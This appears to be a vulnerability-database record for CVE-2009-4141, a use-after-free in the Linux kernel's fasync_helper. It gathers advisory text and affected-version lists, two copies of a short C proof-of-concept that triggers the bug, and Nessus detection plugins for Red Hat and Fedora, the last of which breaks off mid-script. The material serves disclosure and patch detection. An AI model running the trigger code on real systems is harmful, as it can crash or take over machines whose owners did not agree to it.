ID CVE-2009-4141 Type cve Reporter cve@mitre.org Modified 2017-09-19T01:29:00
Description
Use-after-free vulnerability in the fasync_helper function in fs/fcntl.c in the Linux kernel before 2.6.33-rc4-git1 allows local users to gain privileges via vectors that include enabling O_ASYNC (aka FASYNC or FIOASYNC) on a locked file, and then closing this file.
Per: http://cwe.mitre.org/data/definitions/416.html
{"seebug": [{"lastseen": "2017-11-19T18:16:09", "bulletinFamily": "exploit", "description": "Bugraq ID: 37806\r\nCVE ID\uff1aCVE-2009-4141\r\n\r\nLinux\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nLinux\u5185\u6838\u5904\u7406\u9501\u5b9afasync\u6587\u4ef6\u63cf\u8ff0\u7b26\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u4ee5\u5185\u6838\u7279\u6743\u6267\u884c\u4efb\u610f\u4ee3\u7801\u6216\u4f7f\u7cfb\u7edf\u5d29\u6e83\u3002\r\n\u6839\u636eLinus\u5206\u6790\uff0c\u201c\u95ee\u9898\u662f\u76f8\u540c\u6587\u4ef6\u63cf\u8ff0\u7b26\u53ef\u5728\u591a\u4e2afasync\u5217\u8868\u4e0a\uff0c\u5b83\u53ef\u4ee5\u5728\u7279\u5b9afasync\u5217\u8868\u4e0a\u5b58\u5728\u4e00\u6b21\uff0c\u4f46\u662f\u6587\u4ef6\u9501\u5b9a\u6bd4\u8f83\u7279\u6b8a\uff0c\u4f1a\u4f7f\u7528 'fl->fl_fasync'\u5217\u8868\u65e0\u89c6\u5728\u4ec0\u4e48\u5e95\u5c42\u8bbe\u5907\u9a71\u52a8\u6216\u5176\u4ed6\u7684\u60c5\u51b5\u4e0b\u589e\u52a0\u4efb\u610f\u6587\u4ef6\u5230\u5b83\u6240\u5c5e\u7684fasync\u5217\u8868\u4e2d\u3002"\r\n\u8fd9\u4e2a\u95ee\u9898\u662f\u56e0\u4e3a\u5b83\u4e0d\u6b63\u786e\u5047\u5b9a\u67d0\u4e2a\u6587\u4ef6\u53ea\u80fd\u5728\u4e00\u4e2afasync\u5217\u8868\u4e2d\uff0c\u6240\u4ee5fasync_helper()\u4f1a\u6e05\u9664FASYNC\u6807\u8bb0\u3002\r\nhttp://lxr.linux.no/#linux+v2.6.30.4/fs/fcntl.c#L566\r\n\u5f53\u6587\u4ef6\u63cf\u8ff0\u7b26\u6700\u540e\u5173\u95ed\u5e76\u4e14\u6587\u4ef6\u91ca\u653e\u65f6\uff0cFASYNC\u6807\u8bb0\u4e0d\u518d\u8bbe\u7f6e\uff0c\u56e0\u6b64\u5b83\u4e0d\u4f1a\u5728fasync\u5217\u8868\u4e2d\u88ab\u5220\u9664\uff0c\u5bfc\u81f4\u4f1a\u7ed9\u91ca\u653e\u7684\u7ed3\u6784\u9057\u7559\u865a\u6307\u9488(dangling reference)\u3002\n\nLinux kernel 2.6.32\r\nLinux kernel 2.6.31 5\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31 .2\r\nLinux kernel 2.6.31 .11\r\nLinux kernel 2.6.31 -rc7\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31 -rc6\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31 -rc3\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31 -rc1\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31\r\nLinux kernel 2.6.30 rc6\r\nLinux kernel 2.6.30 1\r\nLinux kernel 2.6.30 -rc5\r\nLinux kernel 2.6.30 -rc3\r\nLinux kernel 2.6.30 -rc2\r\nLinux kernel 2.6.30 -rc1\r\nLinux kernel 2.6.30\r\nLinux kernel 2.6.29 4\r\nLinux kernel 2.6.29 1\r\nLinux kernel 2.6.29 -git8\r\nLinux kernel 2.6.29 -git14\r\nLinux kernel 2.6.29 -git1\r\nLinux kernel 2.6.29\r\nLinux kernel 2.6.28 9\r\nLinux kernel 2.6.28 8\r\nLinux kernel 2.6.28 6\r\nLinux kernel 2.6.28 5\r\nLinux kernel 2.6.28 3\r\nLinux kernel 2.6.28 2\r\nLinux kernel 2.6.28 1\r\nLinux kernel 2.6.28 -rc7\r\nLinux kernel 2.6.28 -rc5\r\nLinux kernel 2.6.28 -rc1\r\nLinux kernel 2.6.28 -git7\r\nLinux kernel 2.6.28\r\nLinux kernel 2.6.33-rc4\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.32-rc8\r\nLinux kernel 2.6.32-rc7\r\nLinux kernel 2.6.32-rc5\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.32-rc4\r\nLinux kernel 2.6.32-rc3\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.32-rc2\r\nLinux kernel 2.6.32-rc1\r\nLinux kernel 2.6.31.6\r\nLinux kernel 2.6.31.4\r\nLinux kernel 2.6.31.2\r\nLinux kernel 2.6.31.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31-rc9\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31-rc8\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31-rc7\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31-rc5-git3\r\nLinux kernel 2.6.31-rc4\r\nLinux kernel 2.6.31-rc2\r\nLinux kernel 2.6.31-git11\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.30.5\r\nLinux kernel 2.6.30.4\r\nLinux kernel 2.6.30.3\r\nLinux kernel 2.6.29-rc2-git1\r\nLinux kernel 2.6.29-rc2\r\nLinux kernel 2.6.29-rc1\r\nLinux kernel 2.6.28.4\r\nLinux kernel 2.6.28.10\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=53281b6d34d44308372d16acb7fb5327609f68b6", "modified": "2010-01-16T00:00:00", "published": "2010-01-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18949", "id": "SSV:18949", "title": "Linux Kernel 'fasync_helper()'\u672c\u5730\u7279\u6743\u63d0\u5347\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n #ifndef _GNU_SOURCE\r\n# define _GNU_SOURCE\r\n#endif\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdint.h>\r\n#include <stdbool.h>\r\n#include <fcntl.h>\r\n#include <stdlib.h>\r\n#include <assert.h>\r\n#include <asm/ioctls.h>\r\n\r\n// Testcase for locked async fd bug -- taviso 16-Dec-2009\r\nint main(int argc, char **argv)\r\n{\r\n int fd;\r\n pid_t child;\r\n unsigned flag = ~0;\r\n\r\n fd = open("/dev/urandom", O_RDONLY);\r\n\r\n // set up exclusive lock, but dont block\r\n flock(fd, LOCK_EX | LOCK_NB);\r\n\r\n // set ASYNC flag on descriptor\r\n ioctl(fd, FIOASYNC, &flag);\r\n\r\n // close the file descriptor to trigger the bug\r\n close(fd);\r\n\r\n // now exec some stuff to populate the AT_RANDOM entries, which will cause\r\n // the released file to be used.\r\n\r\n // This assumes /bin/true is an elf executable, and that this kernel\r\n // supports AT_RANDOM.\r\n do switch (child = fork()) {\r\n case 0: execl("/bin/true", "/bin/true", NULL);\r\n abort();\r\n case -1: fprintf(stderr, "fork() failed, %m\\n");\r\n break;\r\n default: fprintf(stderr, ".");\r\n break;\r\n } while (waitpid(child, NULL, 0) != -1);\r\n\r\n fprintf(stderr, "waitpid() failed, %m\\n");\r\n return 1;\r\n}\r\n\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-18949"}], "exploitdb": [{"lastseen": "2016-02-03T19:21:51", "bulletinFamily": "exploit", "description": "Linux Kernel 2.6.x 'fasync_helper()' Local Privilege Escalation Vulnerability. CVE-2009-4141. Local exploit for linux platform", "modified": "2009-12-16T00:00:00", "published": "2009-12-16T00:00:00", "id": "EDB-ID:33523", "href": "https://www.exploit-db.com/exploits/33523/", "type": "exploitdb", "title": "Linux Kernel 2.6.x - 'fasync_helper' Local Privilege Escalation Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/37806/info\r\n\r\nLinux kernel is prone to a local privilege-escalation vulnerability.\r\n\r\nLocal attackers can exploit this issue to execute arbitrary code with kernel-level privileges.\r\n\r\nSuccessful exploits will result in the complete compromise of affected computers.\r\n\r\nThe Linux Kernel 2.6.28 and later are vulnerable. \r\n\r\n#ifndef _GNU_SOURCE\r\n# define _GNU_SOURCE\r\n#endif\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdint.h>\r\n#include <stdbool.h>\r\n#include <fcntl.h>\r\n#include <stdlib.h>\r\n#include <assert.h>\r\n#include <asm/ioctls.h>\r\n\r\n// Testcase for locked async fd bug -- taviso 16-Dec-2009\r\nint main(int argc, char **argv)\r\n{\r\n int fd;\r\n pid_t child;\r\n unsigned flag = ~0;\r\n\r\n fd = open(\"/dev/urandom\", O_RDONLY);\r\n\r\n // set up exclusive lock, but dont block\r\n flock(fd, LOCK_EX | LOCK_NB);\r\n\r\n // set ASYNC flag on descriptor\r\n ioctl(fd, FIOASYNC, &flag);\r\n\r\n // close the file descriptor to trigger the bug\r\n close(fd);\r\n\r\n // now exec some stuff to populate the AT_RANDOM entries, which will cause\r\n // the released file to be used.\r\n\r\n // This assumes /bin/true is an elf executable, and that this kernel\r\n // supports AT_RANDOM.\r\n do switch (child = fork()) {\r\n case 0: execl(\"/bin/true\", \"/bin/true\", NULL);\r\n abort();\r\n case -1: fprintf(stderr, \"fork() failed, %m\\n\");\r\n break;\r\n default: fprintf(stderr, \".\");\r\n break;\r\n } while (waitpid(child, NULL, 0) != -1);\r\n\r\n fprintf(stderr, \"waitpid() failed, %m\\n\");\r\n return 1;\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33523/"}], "nessus": [{"lastseen": "2019-02-21T01:18:16", "bulletinFamily": "scanner", "description": "Updated kernel packages that fix three security issues and multiple bugs are now available for Red Hat Enterprise Linux 5.3 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThis update fixes the following security issues :\n\n* a deficiency was found in the fasync_helper() implementation. This could allow a local, unprivileged user to leverage a use-after-free of locked, asynchronous file descriptors to cause a denial of service or privilege escalation. (CVE-2009-4141, Important)\n\n* a NULL pointer dereference flaw was found in the sctp_rcv_ootb() function in the Linux kernel Stream Control Transmission Protocol (SCTP) implementation. A remote attacker could send a specially crafted SCTP packet to a target system, resulting in a denial of service. (CVE-2010-0008, Important)\n\n* a NULL pointer dereference flaw was found in the ip6_dst_lookup_tail() function in the Linux kernel. An attacker on the local network could trigger this flaw by sending IPv6 traffic to a target system, leading to a system crash (kernel OOPS) if dst->neighbour is NULL on the target system when receiving an IPv6 packet. (CVE-2010-0437, Important)\n\nThis update also fixes the following bugs :\n\n* programs compiled on x86, and that also call sched_rr_get_interval(), were silently corrupted when run on 64-bit systems. With this update, when such programs attempt to call sched_rr_get_interval() on 64-bit systems, sys32_sched_rr_get_interval() is called instead, which resolves this issue. (BZ#557683)\n\n* the fix for CVE-2009-4538 provided by RHSA-2010:0053 introduced a regression, preventing Wake on LAN (WoL) working for network devices using the Intel PRO/1000 Linux driver, e1000e. Attempting to configure WoL for such devices resulted in the following error, even when configuring valid options :\n\n'Cannot set new wake-on-lan settings: Operation not supported not setting wol'\n\nThis update resolves this regression, and WoL now works as expected for network devices using the e1000e driver. (BZ#559334)\n\n* a number of bugs have been fixed in the copy_user routines for Intel 64 and AMD64 systems, one of which could have possibly led to data corruption. (BZ#568307)\n\n* on some systems, a race condition in the inode-based file event notifications implementation caused soft lockups and the following messages :\n\n'BUG: warning at fs/inotify.c:181/set_dentry_child_flags()' 'BUG: soft lockup - CPU#[x] stuck for 10s!'\n\nThis update resolves this race condition, and also removes the inotify debugging code from the kernel, due to race conditions in that code.\n(BZ#568663)\n\nUsers should upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "modified": "2015-10-18T00:00:00", "id": "REDHAT-RHSA-2010-0149.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63922", "published": "2013-01-24T00:00:00", "title": "RHEL 5 : kernel (RHSA-2010:0149)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0149. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63922);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2015/10/18 04:40:37 $\");\n\n script_cve_id(\"CVE-2009-4141\", \"CVE-2010-0008\", \"CVE-2010-0437\");\n script_bugtraq_id(38185);\n script_xref(name:\"RHSA\", value:\"2010:0149\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2010:0149)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix three security issues and multiple\nbugs are now available for Red Hat Enterprise Linux 5.3 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* a deficiency was found in the fasync_helper() implementation. This\ncould allow a local, unprivileged user to leverage a use-after-free of\nlocked, asynchronous file descriptors to cause a denial of service or\nprivilege escalation. (CVE-2009-4141, Important)\n\n* a NULL pointer dereference flaw was found in the sctp_rcv_ootb()\nfunction in the Linux kernel Stream Control Transmission Protocol\n(SCTP) implementation. A remote attacker could send a\nspecially crafted SCTP packet to a target system, resulting in a\ndenial of service. (CVE-2010-0008, Important)\n\n* a NULL pointer dereference flaw was found in the\nip6_dst_lookup_tail() function in the Linux kernel. An attacker on the\nlocal network could trigger this flaw by sending IPv6 traffic to a\ntarget system, leading to a system crash (kernel OOPS) if\ndst->neighbour is NULL on the target system when receiving an IPv6\npacket. (CVE-2010-0437, Important)\n\nThis update also fixes the following bugs :\n\n* programs compiled on x86, and that also call\nsched_rr_get_interval(), were silently corrupted when run on 64-bit\nsystems. With this update, when such programs attempt to call\nsched_rr_get_interval() on 64-bit systems,\nsys32_sched_rr_get_interval() is called instead, which resolves this\nissue. (BZ#557683)\n\n* the fix for CVE-2009-4538 provided by RHSA-2010:0053 introduced a\nregression, preventing Wake on LAN (WoL) working for network devices\nusing the Intel PRO/1000 Linux driver, e1000e. Attempting to configure\nWoL for such devices resulted in the following error, even when\nconfiguring valid options :\n\n'Cannot set new wake-on-lan settings: Operation not supported not\nsetting wol'\n\nThis update resolves this regression, and WoL now works as expected\nfor network devices using the e1000e driver. (BZ#559334)\n\n* a number of bugs have been fixed in the copy_user routines for Intel\n64 and AMD64 systems, one of which could have possibly led to data\ncorruption. (BZ#568307)\n\n* on some systems, a race condition in the inode-based file event\nnotifications implementation caused soft lockups and the following\nmessages :\n\n'BUG: warning at fs/inotify.c:181/set_dentry_child_flags()' 'BUG: soft\nlockup - CPU#[x] stuck for 10s!'\n\nThis update resolves this race condition, and also removes the inotify\ndebugging code from the kernel, due to race conditions in that code.\n(BZ#568663)\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-4141.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0008.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0437.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0149.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debug-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", reference:\"kernel-doc-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-headers-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-128.14.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:13:31", "bulletinFamily": "scanner", "description": "Kernel security update for Fedora 11: CVE-2009-4141 CVE-2009-4536 CVE-2009-4537 CVE-2009-4538 CVE-2010-0307 Bugs: 559100 kernel:\ntty->pgrp races 521265 oops in VIA padlock driver\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-07-12T00:00:00", "id": "FEDORA_2010-1500.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=47258", "published": "2010-07-01T00:00:00", "title": "Fedora 11 : kernel-2.6.30.10-105.2.13.fc11 (2010-1500)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-1500.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(47258);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2018/07/12 15:01:51\");\n\n script_cve_id(\"CVE-2009-4141\", \"CVE-2009-4536\", \"CVE-2009-4537\", \"CVE-2009-4538\", \"CVE-2010-0307\");\n script_bugtraq_id(36379, 36512, 36635, 36639, 36723, 36793, 36803, 36824, 36827, 36901, 37521);\n script_xref(name:\"FEDORA\", value:\"2010-1500\");\n\n script_name(english:\"Fedora 11 : kernel-2.6.30.10-105.2.13.fc11 (2010-1500)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Kernel security update for Fedora 11: CVE-2009-4141 CVE-2009-4536\nCVE-2009-4537 CVE-2009-4538 CVE-2010-0307 Bugs: 559100 kernel:\ntty->pgrp races 521265 oops in VIA padlock driver\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=547906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=550907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=551214\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=552126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=559100\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=560547\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/034830.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b8d616ab\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 